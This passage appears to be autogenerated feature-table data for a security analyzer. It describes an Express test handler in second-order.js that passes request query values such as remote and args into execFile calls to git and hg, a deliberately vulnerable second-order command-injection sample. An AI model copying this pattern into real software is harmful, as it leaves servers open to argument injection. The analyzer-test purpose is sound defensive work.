fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:19:33:65 | exceptional return of ["add", ... rgs()]) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:19:33:65 | exceptional return of ["add", ... rgs()]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:19:33:65 | exceptional return of ["add", ... rgs()]) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:19:33:65 | exceptional return of ["add", ... rgs()]) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:19:33:65 | exceptional return of ["add", ... rgs()]) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:20:33:24 | "add" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:20:33:24 | "add" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:20:33:24 | "add" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:20:33:24 | "add" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:20:33:24 | "add" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:20:33:24 | "add" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:20:33:24 | "add" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:20:33:24 | "add" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:20:33:24 | "add" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:20:33:24 | "add" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:27:33:29 | req | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:27:33:29 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:27:33:29 | req | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:27:33:29 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:27:33:29 | req | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:27:33:35 | req.query | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:27:33:35 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:27:33:35 | req.query | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:27:33:35 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:27:33:35 | req.query | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:27:33:42 | req.query.remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:27:33:42 | req.query.remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:27:33:42 | req.query.remote | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:27:33:42 | req.query.remote | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:27:33:42 | req.query.remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:27:33:42 | req.query.remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:27:33:42 | req.query.remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:27:33:42 | req.query.remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:27:33:42 | req.query.remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:27:33:42 | req.query.remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:31:33:35 | query | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:31:33:35 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:31:33:35 | query | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:31:33:35 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:31:33:35 | query | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:37:33:42 | remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:37:33:42 | remote | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:37:33:42 | remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:37:33:42 | remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:37:33:42 | remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:45:33:50 | concat | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:45:33:50 | concat | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:45:33:50 | concat | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:45:33:50 | concat | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:45:33:50 | concat | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:52:33:64 | [otherargs()] | CalleeFlexibleAccessPath | ?.concat | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:52:33:64 | [otherargs()] | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:52:33:64 | [otherargs()] | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:52:33:64 | [otherargs()] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:52:33:64 | [otherargs()] | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:52:33:64 | [otherargs()] | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:52:33:64 | [otherargs()] | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:53:33:61 | otherargs | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:53:33:61 | otherargs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:53:33:61 | otherargs | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:53:33:61 | otherargs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:53:33:61 | otherargs | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:53:33:63 | exceptional return of otherargs() | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:53:33:63 | exceptional return of otherargs() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:53:33:63 | exceptional return of otherargs() | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:53:33:63 | exceptional return of otherargs() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:53:33:63 | exceptional return of otherargs() | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:53:33:63 | otherargs() | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:53:33:63 | otherargs() | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:53:33:63 | otherargs() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:53:33:63 | otherargs() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:53:33:63 | otherargs() | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:53:33:63 | otherargs() | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:53:33:63 | otherargs() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:53:33:63 | otherargs() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:53:33:63 | otherargs() | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:53:33:63 | otherargs() | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:3:35:10 | execFile | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:3:35:10 | execFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:3:35:10 | execFile | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:3:35:10 | execFile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:3:35:10 | execFile | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:3:35:78 | exceptional return of execFil ... rArgs)) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:3:35:78 | exceptional return of execFil ... rArgs)) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:3:35:78 | exceptional return of execFil ... rArgs)) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:3:35:78 | exceptional return of execFil ... rArgs)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:3:35:78 | exceptional return of execFil ... rArgs)) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:3:35:78 | execFil ... rArgs)) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:3:35:78 | execFil ... rArgs)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:3:35:78 | execFil ... rArgs)) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:3:35:78 | execFil ... rArgs)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:3:35:78 | execFil ... rArgs)) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:12:35:16 | "git" | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:12:35:16 | "git" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:12:35:16 | "git" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:12:35:16 | "git" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:12:35:16 | "git" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:12:35:16 | "git" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:12:35:16 | "git" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:12:35:16 | "git" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:19:35:49 | ["ls-re ... remote] | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:19:35:49 | ["ls-re ... remote] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:19:35:49 | ["ls-re ... remote] | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:19:35:49 | ["ls-re ... remote] | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:19:35:49 | ["ls-re ... remote] | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:19:35:56 | ["ls-re ... .concat | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:19:35:56 | ["ls-re ... .concat | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:19:35:56 | ["ls-re ... .concat | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:19:35:56 | ["ls-re ... .concat | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:19:35:56 | ["ls-re ... .concat | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:19:35:77 | ["ls-re ... erArgs) | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:19:35:77 | ["ls-re ... erArgs) | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:19:35:77 | ["ls-re ... erArgs) | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:19:35:77 | ["ls-re ... erArgs) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:19:35:77 | ["ls-re ... erArgs) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:19:35:77 | ["ls-re ... erArgs) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:19:35:77 | ["ls-re ... erArgs) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:19:35:77 | ["ls-re ... erArgs) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:19:35:77 | exceptional return of ["ls-re ... erArgs) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:19:35:77 | exceptional return of ["ls-re ... erArgs) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:19:35:77 | exceptional return of ["ls-re ... erArgs) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- 